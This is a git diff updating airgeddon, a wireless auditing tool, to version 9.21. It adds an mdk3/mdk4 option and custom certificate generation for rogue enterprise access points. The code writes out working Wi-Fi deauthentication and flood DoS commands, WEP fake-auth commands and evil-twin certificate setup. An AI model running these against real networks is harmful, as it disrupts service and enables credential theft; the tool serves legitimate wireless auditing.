diff --git a/.airgeddonrc b/.airgeddonrc index f99c1e9ef..9cee2e591 100644 --- a/.airgeddonrc +++ b/.airgeddonrc @@ -25,6 +25,9 @@ AIRGEDDON_5GHZ_ENABLED=true #Enabled true / Disabled false - Force to use iptables instead of nftables (it has no effect if nftables are not present) - Default value false AIRGEDDON_FORCE_IPTABLES=false +#Available values: mdk3, mdk4 - Define which mdk version is going to be used - Default value mdk4 +AIRGEDDON_MDK_VERSION=mdk4 + #Enabled true / Disabled false - Development mode for faster development skipping intro and all initial checks - Default value false AIRGEDDON_DEVELOPMENT_MODE=false diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 000000000..41e755fd2 --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1,3 @@ +# These are supported funding model platforms + +custom: ['https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=7ELM486P7XKKG', 'https://www.blockchain.com/btc/address/1NSzwqtBBdo4CrvynPZmd85xfbL7hw3Ptu', 'https://www.blockchain.com/bch/address/1GyUesBgwHKZBeFvkT5nfteecPdH6bAEaL', 'https://www.blockchain.com/eth/address/0xf88107ba5e10776a37ec089a7ed2bac57638eea7', 'https://www.buymeacoffee.com/v1s1t0r'] diff --git a/CHANGELOG.md b/CHANGELOG.md index a9147c132..7acb0c216 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,11 @@ +### 9.21 + - Fixed non-closing windows on some DoS pursuit mode attacks + - Added retrocompatibility for mdk3, added option in .airgeddonrc file to handle it + - Fixed bug on WEP all-in-one attack (Fake Auth) for SSIDs containing spaces + - Fixed repeated enterprise plain passwords captured on trophy files + - Added custom certificates creation for enterprise attacks + - Fixed error on BeEF attack using tmux + ### 9.20 - Added option to use tmux instead of xterm (Thank you to "xpz3") - Added WPS null PIN attack (reaver) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index cb7c3ad68..3492c2fdb 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -16,6 +16,7 @@ Please note we have a [Code of Conduct], please follow it in all your interactio 3. If an issue is opened and more info is needed, `airgeddon` staff will request it. If there is no answer in 7 days or the OP is not collaborating, the issue will be closed. 4. If the issue is not related to airgeddon or the root cause is out of scope, it will be closed. `airgeddon` staff is not a helpdesk support service. 5. Try to be sure that your problem is related to airgeddon and that is not a driver issue. A good practice is always to try to perform the same operation without using `airgeddon` in order to see if the problem or the behavior can be reproduced. In that case, probably the issue should not be created. +6. Don't talk or mention references to other tools. If you want to talk about other similar tools you can do it on their pages/github. `airgeddon` issues are to talk about `airgeddon`. ## Collaborating Translators @@ -95,7 +96,8 @@ If you enjoyed the script, feel free to donate. Support the project through Payp
- + Paypal + Buy me a coffee

@@ -115,13 +117,13 @@ If you enjoyed the script, feel free to donate. Support the project through Payp - + Bitcoin - + Bitcoin Cash - + Dash @@ -137,13 +139,13 @@ If you enjoyed the script, feel free to donate. Support the project through Payp - + Ethereum - + Litecoin - + ZCash diff --git a/Dockerfile b/Dockerfile index 3837ec251..95f9906ee 100644 --- a/Dockerfile +++ b/Dockerfile @@ -68,6 +68,7 @@ RUN \ apt -y install \ crunch \ hashcat \ + mdk3 \ mdk4 \ hostapd \ lighttpd \ @@ -83,7 +84,8 @@ RUN \ expect \ hostapd-wpe \ asleap \ - john + john \ + openssl #Install needed Ruby gems RUN \ diff --git a/LICENSE.md b/LICENSE similarity index 100% rename from LICENSE.md rename to LICENSE diff --git a/README.md b/README.md index c052e6d67..9d13d78b9 100644 --- a/README.md +++ b/README.md @@ -82,7 +82,7 @@ All the needed info about how to "install | use | enjoy" `airgeddon` is present [Hat Tip To]: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Hat%20Tip%20To [Inspiration]: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Inspiration -[Version-shield]: https://img.shields.io/badge/version-9.20-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version" +[Version-shield]: https://img.shields.io/badge/version-9.21-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version" [Bash4.2-shield]: https://img.shields.io/badge/bash-4.2%2B-blue.svg?style=flat-square&colorA=273133&colorB=00db00 "Bash 4.2 or later" [License-shield]: https://img.shields.io/badge/license-GPL%20v3%2B-blue.svg?style=flat-square&colorA=273133&colorB=bd0000 "GPL v3+" [Docker-shield]: https://img.shields.io/docker/automated/v1s1t0r1sh3r3/airgeddon.svg?style=flat-square&colorA=273133&colorB=f9ff5a "Docker rules!" diff --git a/airgeddon.sh b/airgeddon.sh index 052a36bd3..cc336f22c 100755 --- a/airgeddon.sh +++ b/airgeddon.sh @@ -2,11 +2,15 @@ #Title........: airgeddon.sh #Description..: This is a multi-use bash script for Linux systems to audit wireless networks. #Author.......: v1s1t0r -#Date.........: 20190415 -#Version......: 9.20 +#Date.........: 20190812 +#Version......: 9.21 #Usage........: bash airgeddon.sh #Bash Version.: 4.2 or later +#Global shellcheck disabled warnings +#shellcheck disable=SC2154 +#shellcheck disable=SC2034 + #Language vars #Change this line to select another default language. Select one from available values in array language="ENGLISH" @@ -62,6 +66,7 @@ optional_tools_names=( "hostapd-wpe" "asleap" "john" + "openssl" ) update_tools=("curl") @@ -100,18 +105,18 @@ declare -A possible_package_names=( [${optional_tools_names[21]}]="hostapd-wpe" #hostapd-wpe [${optional_tools_names[22]}]="asleap" #asleap [${optional_tools_names[23]}]="john" #john + [${optional_tools_names[24]}]="openssl" #openssl [${update_tools[0]}]="curl" #curl ) #More than one alias can be defined separated by spaces at value declare -A possible_alias_names=( ["beef"]="beef-xss beef-server" - ["nft"]="iptables" ) #General vars -airgeddon_version="9.20" -language_strings_expected_version="9.20-1" +airgeddon_version="9.21" +language_strings_expected_version="9.21-1" standardhandshake_filename="handshake-01.cap" timeout_capture_handshake="20" tmpdir="/tmp/" @@ -247,6 +252,10 @@ hostapd_wpe_log="ag.hostapd_wpe.log" control_et_file="ag.et_control.sh" control_enterprise_file="ag.enterprise_control.sh" enterprisedir="enterprise/" +certsdir="certs/" +certspass="airgeddon" +default_certs_path="/etc/hostapd-wpe/certs/" +default_certs_pass="whatever" webserver_file="ag.lighttpd.conf" webdir="www/" indexfile="index.htm" @@ -323,7 +332,7 @@ declare evil_twin_dos_hints=(267 268 509) declare beef_hints=(408) declare wps_hints=(342 343 344 356 369 390 490 625) declare wep_hints=(431 429 428 432 433) -declare enterprise_hints=(112 332 483 518) +declare enterprise_hints=(112 332 483 518 629) #Charset vars crunch_lowercasecharset="abcdefghijklmnopqrstuvwxyz" @@ -552,13 +561,13 @@ function option_toggle() { if ! grep "${option_var_name}=false" "${scriptfolder}${rc_file}" > /dev/null; then return 1 fi - export ${option_var_name}=false + eval "export ${option_var_name}=false" else sed -ri "s:(${option_var_name})=(false):\1=true:" "${scriptfolder}${rc_file}" 2> /dev/null if ! grep "${option_var_name}=true" "${scriptfolder}${rc_file}" > /dev/null; then return 1 fi - export ${option_var_name}=true + eval "export ${option_var_name}=true" fi case "${option_var_name}" in @@ -985,6 +994,7 @@ function calculate_computepin_algorithm_step2() { } #Calculate pin based on Stefan Viehböck algorithm (EasyBox) +#shellcheck disable=SC2207 function calculate_easybox_algorithm() { debug_print @@ -1187,10 +1197,10 @@ function search_in_pin_database() { for item in "${!PINDB[@]}"; do if [ "${item}" = "${six_wpsbssid_first_digits_clean}" ]; then bssid_found_in_db=1 - arrpins=(${PINDB[${item//[[:space:]]/ }]}) + arrpins=("${PINDB[${item//[[:space:]]/ }]}") for item2 in "${arrpins[@]}"; do counter_pins_found=$((counter_pins_found + 1)) - pins_found+=(${item2}) + pins_found+=("${item2}") fill_wps_data_array "${wps_bssid}" "Database" "${item2}" done break @@ -1216,16 +1226,16 @@ function check_interface_supported_bands() { get_5ghz_band_info_from_phy_interface "${1}" case "$?" in "0") - interfaces_band_info["${2}","5Ghz_allowed"]=1 - interfaces_band_info["${2}","text"]="${band_24ghz}, ${band_5ghz}" + interfaces_band_info["${2},5Ghz_allowed"]=1 + interfaces_band_info["${2},text"]="${band_24ghz}, ${band_5ghz}" ;; "1") - interfaces_band_info["${2}","5Ghz_allowed"]=0 - interfaces_band_info["${2}","text"]="${band_24ghz}" + interfaces_band_info["${2},5Ghz_allowed"]=0 + interfaces_band_info["${2},text"]="${band_24ghz}" ;; "2") - interfaces_band_info["${2}","5Ghz_allowed"]=0 - interfaces_band_info["${2}","text"]="${band_24ghz}, ${band_5ghz} (${red_color}${disabled_text[${language}]}${pink_color})" + interfaces_band_info["${2},5Ghz_allowed"]=0 + interfaces_band_info["${2},text"]="${band_24ghz}, ${band_5ghz} (${red_color}${disabled_text[${language}]}${pink_color})" ;; esac } @@ -1612,6 +1622,11 @@ function option_menu() { else language_strings "${language}" 617 fi + if [ "${AIRGEDDON_MDK_VERSION}" = "mdk3" ]; then + language_strings "${language}" 638 + else + language_strings "${language}" 637 + fi language_strings "${language}" 447 print_hint ${current_menu} @@ -1862,6 +1877,16 @@ function option_menu() { language_strings "${language}" 115 "read" ;; 11) + ask_yesno 639 "yes" + if [ "${yesno}" = "y" ]; then + mdk_version_toggle + + echo + language_strings "${language}" 640 "yellow" + language_strings "${language}" 115 "read" + fi + ;; + 12) ask_yesno 478 "yes" if [ "${yesno}" = "y" ]; then get_current_permanent_language @@ -2698,6 +2723,328 @@ function handshake_capture_check() { fi } +#Generate the needed config files for certificates creation +#shellcheck disable=SC2016 +function create_certificates_config_files() { + + debug_print + + tmpfiles_toclean=1 + rm -rf "${tmpdir}${certsdir}" > /dev/null 2>&1 + mkdir "${tmpdir}${certsdir}" > /dev/null 2>&1 + + { + echo -e "[ ca ]" + echo -e "default_ca = CA_default\n" + echo -e "[ CA_default ]" + echo -e "dir = ${tmpdir}${certsdir::-1}" + echo -e 'certs = $dir' + echo -e 'crl_dir = $dir/crl' + echo -e 'database = $dir/index.txt' + echo -e 'new_certs_dir = $dir' + echo -e 'certificate = $dir/server.pem' + echo -e 'serial = $dir/serial' + echo -e 'crl = $dir/crl.pem' + echo -e 'private_key = $dir/server.key' + echo -e 'RANDFILE = $dir/.rand' + echo -e "name_opt = ca_default" + echo -e "cert_opt = ca_default" + echo -e "default_days = 3650" + echo -e "default_crl_days = 30" + echo -e "default_md = md5" + echo -e "preserve = no" + echo -e "policy = policy_match\n" + echo -e "[ policy_match ]" + echo -e "countryName = match" + echo -e "stateOrProvinceName = match" + echo -e "organizationName = match" + echo -e "organizationalUnitName = optional" + echo -e "commonName = supplied" + echo -e "emailAddress = optional\n" + echo -e "[ policy_anything ]" + echo -e "countryName = optional" + echo -e "stateOrProvinceName = optional" + echo -e "localityName = optional" + echo -e "organizationName = optional" + echo -e "organizationalUnitName = optional" + echo -e "commonName = supplied" + echo -e "emailAddress = optional\n" + echo -e "[ req ]" + echo -e "prompt = no" + echo -e "distinguished_name = server" + echo -e "default_bits = 2048" + echo -e "input_password = ${certspass}" + echo -e "output_password = ${certspass}\n" + echo -e "[server]" + echo -e "countryName = ${custom_certificates_country}" + echo -e "stateOrProvinceName = ${custom_certificates_state}" + echo -e "localityName = ${custom_certificates_locale}" + echo -e "organizationName = ${custom_certificates_organization}" + echo -e "emailAddress = ${custom_certificates_email}" + echo -e "commonName = \"${custom_certificates_cn}\"" + } >> "${tmpdir}${certsdir}server.cnf" + + { + echo -e "[ ca ]" + echo -e "default_ca = CA_default\n" + echo -e "[ CA_default ]" + echo -e "dir = ${tmpdir}${certsdir::-1}" + echo -e 'certs = $dir' + echo -e 'crl_dir = $dir/crl' + echo -e 'database = $dir/index.txt' + echo -e 'new_certs_dir = $dir' + echo -e 'certificate = $dir/ca.pem' + echo -e 'serial = $dir/serial' + echo -e 'crl = $dir/crl.pem' + echo -e 'private_key = $dir/ca.key' + echo -e 'RANDFILE = $dir/.rand' + echo -e "name_opt = ca_default" + echo -e "cert_opt = ca_default" + echo -e "default_days = 3650" + echo -e "default_crl_days = 30" + echo -e "default_md = md5" + echo -e "preserve = no" + echo -e "policy = policy_match\n" + echo -e "[ policy_match ]" + echo -e "countryName = match" + echo -e "stateOrProvinceName = match" + echo -e "organizationName= match" + echo -e "organizationalUnitName = optional" + echo -e "commonName = supplied" + echo -e "emailAddress = optional\n" + echo -e "[ policy_anything ]" + echo -e "countryName = optional" + echo -e "stateOrProvinceName = optional" + echo -e "localityName = optional" + echo -e "organizationName = optional" + echo -e "organizationalUnitName = optional" + echo -e "commonName = supplied" + echo -e "emailAddress = optional\n" + echo -e "[ req ]" + echo -e "prompt = no" + echo -e "distinguished_name = certificate_authority" + echo -e "default_bits = 2048" + echo -e "input_password = ${certspass}" + echo -e "output_password = ${certspass}" + echo -e "x509_extensions = v3_ca\n" + echo -e "[certificate_authority]" + echo -e "countryName = ${custom_certificates_country}" + echo -e "stateOrProvinceName = ${custom_certificates_state}" + echo -e "localityName = ${custom_certificates_locale}" + echo -e "organizationName = ${custom_certificates_organization}" + echo -e "emailAddress = ${custom_certificates_email}" + echo -e "commonName = \"${custom_certificates_cn}\"\n" + echo -e "[v3_ca]" + echo -e "subjectKeyIdentifier = hash" + echo -e "authorityKeyIdentifier = keyid:always,issuer:always" + echo -e "basicConstraints = CA:true" + } >> "${tmpdir}${certsdir}ca.cnf" + + { + echo -e "[ xpclient_ext ]" + echo -e "extendedKeyUsage = 1.3.6.1.5.5.7.3.2\n" + echo -e "[ xpserver_ext ]" + echo -e "extendedKeyUsage = 1.3.6.1.5.5.7.3.1" + } >> "${tmpdir}${certsdir}xpextensions" +} + +#Manage the questions to decide if custom certificates are used +function custom_certificates_integration() { + + debug_print + + ask_yesno 645 "no" + if [ "${yesno}" = "y" ]; then + if [ -n "${enterprisecerts_completepath}" ]; then + ask_yesno 646 "yes" + if [ "${yesno}" = "y" ]; then + read_certspath=0 + else + read_certspath=1 + fi + else + read_certspath=1 + fi + use_custom_certs=1 + else + use_custom_certs=0 + fi + + echo + if [ "${use_custom_certs}" -eq 1 ]; then + if [ "${read_certspath}" -eq 0 ]; then + hostapd_wpe_cert_path="${enterprisecerts_completepath}" + hostapd_wpe_cert_pass="${certspass}" + language_strings "${language}" 648 "yellow" + else + language_strings "${language}" 653 "green" + read -rp "> " hostapd_wpe_cert_path + + lastcharhostapd_wpe_cert_path=${hostapd_wpe_cert_path: -1} + if [ "${lastcharhostapd_wpe_cert_path}" != "/" ]; then + hostapd_wpe_cert_path="${hostapd_wpe_cert_path}/" + fi + + firstcharhostapd_wpe_cert_path=${hostapd_wpe_cert_path:: 1} + if [ "${firstcharhostapd_wpe_cert_path}" != "/" ]; then + hostapd_wpe_cert_path="${scriptfolder}${hostapd_wpe_cert_path}" + fi + + echo + language_strings "${language}" 654 "green" + read -rp "> " hostapd_wpe_cert_pass + fi + else + hostapd_wpe_cert_path="${default_certs_path}" + hostapd_wpe_cert_pass="${default_certs_pass}" + language_strings "${language}" 647 "yellow" + fi + + echo + language_strings "${language}" 649 "blue" + echo + + local certsresult + certsresult=$(validate_certificates "${hostapd_wpe_cert_path}" "${hostapd_wpe_cert_pass}") + if [ "${certsresult}" = "0" ]; then + language_strings "${language}" 650 "yellow" + language_strings "${language}" 115 "read" + return 0 + elif [ "${certsresult}" = "1" ]; then + language_strings "${language}" 651 "red" + language_strings "${language}" 115 "read" + return 1 + else + language_strings "${language}" 652 "red" + language_strings "${language}" 115 "read" + return 1 + fi +} + +#Validate if certificates files are correct +function validate_certificates() { + + debug_print + local certsresult + certsresult=0 + + if ! [ -f "${1}server.pem" ] || ! [ -r "${1}server.pem" ] || ! [ -f "${1}ca.pem" ] || ! [ -r "${1}ca.pem" ] || ! [ -f "${1}server.key" ] || ! [ -r "${1}server.key" ]; then + certsresult=1 + else + if ! openssl x509 -in "${1}server.pem" -inform "PEM" -checkend "0" &> "/dev/null" || ! openssl x509 -in "${1}ca.pem" -inform "PEM" -checkend "0" &> /dev/null || ! openssl rsa -in "${1}server.key" -passin "pass:${2}" -check &> /dev/null; then + certsresult=2 + fi + fi + + echo "${certsresult}" +} + +#Create custom certificates +function create_custom_certificates() { + + debug_print + + echo + language_strings "${language}" 642 "blue" + + openssl dhparam -out "${tmpdir}${certsdir}dh" 1024 > /dev/null 2>&1 + openssl req -new -out "${tmpdir}${certsdir}server.csr" -keyout "${tmpdir}${certsdir}server.key" -config "${tmpdir}${certsdir}server.cnf" > /dev/null 2>&1 + openssl req -new -x509 -keyout "${tmpdir}${certsdir}ca.key" -out "${tmpdir}${certsdir}ca.pem" -days 3650 -config "${tmpdir}${certsdir}ca.cnf" > /dev/null 2>&1 + touch "${tmpdir}${certsdir}index.txt" > /dev/null 2>&1 + echo '01' > "${tmpdir}${certsdir}serial" 2> /dev/null + openssl ca -batch -keyfile "${tmpdir}${certsdir}ca.key" -cert "${tmpdir}${certsdir}ca.pem" -in "${tmpdir}${certsdir}server.csr" -key "${certspass}" -out "${tmpdir}${certsdir}server.crt" -extensions xpserver_ext -extfile "${tmpdir}${certsdir}xpextensions" -config "${tmpdir}${certsdir}server.cnf" > /dev/null 2>&1 + openssl pkcs12 -export -in "${tmpdir}${certsdir}server.crt" -inkey "${tmpdir}${certsdir}server.key" -out "${tmpdir}${certsdir}server.p12" -passin pass:${certspass} -passout pass:${certspass} > /dev/null 2>&1 + openssl pkcs12 -in "${tmpdir}${certsdir}server.p12" -out "${tmpdir}${certsdir}server.pem" -passin pass:${certspass} -passout pass:${certspass} > /dev/null 2>&1 + + manage_enterprise_certs + save_enterprise_certs +} + +#Set up custom certificates +function custom_certificates_questions() { + + debug_print + + custom_certificates_country="" + custom_certificates_state="" + custom_certificates_locale="" + custom_certificates_organization="" + custom_certificates_email="" + custom_certificates_cn="" + + local email_length_regex + local email_spetial_chars_regex + local email_domain_regex + local regexp + + regexp="^[A-Za-z]{2}$" + while [[ ! ${custom_certificates_country} =~ ${regexp} ]]; do + read_certificates_data "country" + done + + while [[ -z "${custom_certificates_state}" ]]; do + read_certificates_data "state" + done + + while [[ -z "${custom_certificates_locale}" ]]; do + read_certificates_data "locale" + done + + while [[ -z "${custom_certificates_organization}" ]]; do + read_certificates_data "organization" + done + + email_length_regex='.*{7,320}' + email_spetial_chars_regex='\!\#\$\%\&\*\+\/\=\?\^\_\`\{\|\}\~\-' + email_domain_regex='([[:alpha:]]([[:alnum:]\-]*[[:alnum:]])?)\.([[:alpha:]]([[:alnum:]\-]*[[:alnum:]])?\.)*[[:alpha:]]([[:alnum:]\-]*[[:alnum:]])?' + regexp="^[[:alnum:]${email_spetial_chars_regex}]+(\.[[:alnum:]${email_spetial_chars_regex}]+)*[[:alnum:]${email_spetial_chars_regex}]*\@${email_domain_regex}$" + while [[ ! ${custom_certificates_email} =~ ${regexp} ]] || [[ ! ${custom_certificates_email} =~ ${email_length_regex} ]]; do + read_certificates_data "email" + done + + regexp="^(\*|[[:alpha:]]([[:alnum:]\-]{0,61}[[:alnum:]])?)\.([[:alpha:]]([[:alnum:]\-]{0,61}[[:alnum:]])?\.)*[[:alpha:]]([[:alnum:]\-]{0,61}[[:alnum:]])?$" + while [[ ! ${custom_certificates_cn} =~ ${regexp} ]]; do + read_certificates_data "cn" + done +} + +#Read the user input on custom certificates questions +function read_certificates_data() { + + debug_print + + echo + case "${1}" in + "country") + language_strings "${language}" 630 "green" + read -rp "> " custom_certificates_country + custom_certificates_country="${custom_certificates_country^^}" + ;; + "state") + language_strings "${language}" 631 "green" + read -rp "> " custom_certificates_state + ;; + "locale") + language_strings "${language}" 632 "green" + read -rp "> " custom_certificates_locale + ;; + "organization") + language_strings "${language}" 633 "green" + read -rp "> " custom_certificates_organization + ;; + "email") + language_strings "${language}" 634 "green" + read -rp "> " custom_certificates_email + custom_certificates_email="${custom_certificates_email,,}" + ;; + "cn") + language_strings "${language}" 635 "green" + read -rp "> " custom_certificates_cn + custom_certificates_cn="${custom_certificates_cn,,}" + ;; + esac +} + #Validate if selected network has the needed type of encryption function validate_network_encryption_type() { @@ -3340,9 +3687,9 @@ function set_wep_script() { EOF cat >&6 <<-EOF - manage_output "-bg \"#000000\" -fg \"#00FF00\" -geometry ${g5_left1} -T \"Fake Auth\"" "aireplay-ng -1 3 -o 1 -q 10 -e \"${essid}\" -a ${bssid} -h ${current_mac} ${interface}" "Fake Auth" + manage_output "-bg \"#000000\" -fg \"#00FF00\" -geometry ${g5_left1} -T \"Fake Auth\"" "aireplay-ng -1 3 -o 1 -q 10 -a ${bssid} -h ${current_mac} ${interface}" "Fake Auth" if [ "\${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "aireplay-ng -1 3 -o 1 -q 10 -e \"${essid}\" -a ${bssid} -h ${current_mac} ${interface}" + get_tmux_process_id "aireplay-ng -1 3 -o 1 -q 10 -a ${bssid} -h ${current_mac} ${interface}" wep_fakeauth_pid="\${global_process_pid}" global_process_pid="" else @@ -3620,13 +3967,13 @@ function launch_dos_pursuit_mode_attack() { recalculate_windows_sizes case "${1}" in - "mdk4 amok attack") + "${mdk_command} amok attack") dos_delay=1 interface_pursuit_mode_scan="${interface}" interface_pursuit_mode_deauth="${interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" "${1} (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" "${1} (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3647,9 +3994,9 @@ function launch_dos_pursuit_mode_attack() { dos_delay=10 interface_pursuit_mode_scan="${interface}" interface_pursuit_mode_deauth="${interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "${1} (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "${1} (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3658,9 +4005,9 @@ function launch_dos_pursuit_mode_attack() { dos_delay=1 interface_pursuit_mode_scan="${interface}" interface_pursuit_mode_deauth="${interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} b -n ${essid} -c ${channel} -s 1000 -h" "${1} (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} b -n ${essid} -c ${channel} -s 1000 -h" "${1} (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} b -n ${essid} -c ${channel} -s 1000 -h" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} b -n ${essid} -c ${channel} -s 1000 -h" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3669,9 +4016,9 @@ function launch_dos_pursuit_mode_attack() { dos_delay=1 interface_pursuit_mode_scan="${interface}" interface_pursuit_mode_deauth="${interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} a -a ${bssid} -m -s 1024" "${1} (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} a -a ${bssid} -m -s 1024" "${1} (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} a -a ${bssid} -m -s 1024" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} a -a ${bssid} -m -s 1024" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3680,20 +4027,20 @@ function launch_dos_pursuit_mode_attack() { dos_delay=1 interface_pursuit_mode_scan="${interface}" interface_pursuit_mode_deauth="${interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} m -t ${bssid} -w 1 -n 1024 -s 1024" "${1} (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} m -t ${bssid} -w 1 -n 1024 -s 1024" "${1} (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} m -t ${bssid} -w 1 -n 1024 -s 1024" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} m -t ${bssid} -w 1 -n 1024 -s 1024" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi ;; - "Mdk4") + "${mdk_command}") dos_delay=1 interface_pursuit_mode_scan="${secondary_wifi_interface}" interface_pursuit_mode_deauth="${secondary_wifi_interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" "Deauth (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" "Deauth (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3714,9 +4061,9 @@ function launch_dos_pursuit_mode_attack() { dos_delay=10 interface_pursuit_mode_scan="${secondary_wifi_interface}" interface_pursuit_mode_deauth="${secondary_wifi_interface}" - manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "mdk4 ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "Deauth (DoS Pursuit mode)" + manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "Deauth (DoS Pursuit mode)" if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then - get_tmux_process_id "mdk4 ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" + get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" dos_pursuit_mode_attack_pid="${global_process_pid}" global_process_pid="" fi @@ -3770,6 +4117,20 @@ function launch_dos_pursuit_mode_attack() { airodump-ng -w "${tmpdir}dos_pm" "${interface_pursuit_mode_scan}" --band "${airodump_band_modifier}" > /dev/null 2>&1 & dos_pursuit_mode_scan_pid=$! dos_pursuit_mode_pids+=("${dos_pursuit_mode_scan_pid}") + + if [[ "${et_mode}" = "et_captive_portal" ]] || [[ -n "${enterprise_mode}" ]]; then + + local processes_file + if [ "${et_mode}" = "et_captive_portal" ]; then + processes_file="${tmpdir}${webdir}${et_processesfile}" + elif [ -n "${enterprise_mode}" ]; then + processes_file="${tmpdir}${enterprisedir}${enterprise_processesfile}" + fi + + for item in "${dos_pursuit_mode_pids[@]}"; do + echo "${item}" >> "${processes_file}" + done + fi } #Parse and control pids for DoS pursuit mode attack @@ -3814,8 +4175,8 @@ pid_control_pursuit_mode() { kill_dos_pursuit_mode_processes } -#Execute mdk4 deauth DoS attack -function exec_mdk4deauth() { +#Execute mdk deauth DoS attack +function exec_mdkdeauth() { debug_print @@ -3833,14 +4194,14 @@ function exec_mdk4deauth() { language_strings "${language}" 4 "read" dos_pursuit_mode_pids=() - launch_dos_pursuit_mode_attack "mdk4 amok attack" "first_time" - pid_control_pursuit_mode "mdk4 amok attack" + launch_dos_pursuit_mode_attack "${mdk_command} amok attack" "first_time" + pid_control_pursuit_mode "${mdk_command} amok attack" else language_strings "${language}" 33 "yellow" language_strings "${language}" 4 "read" 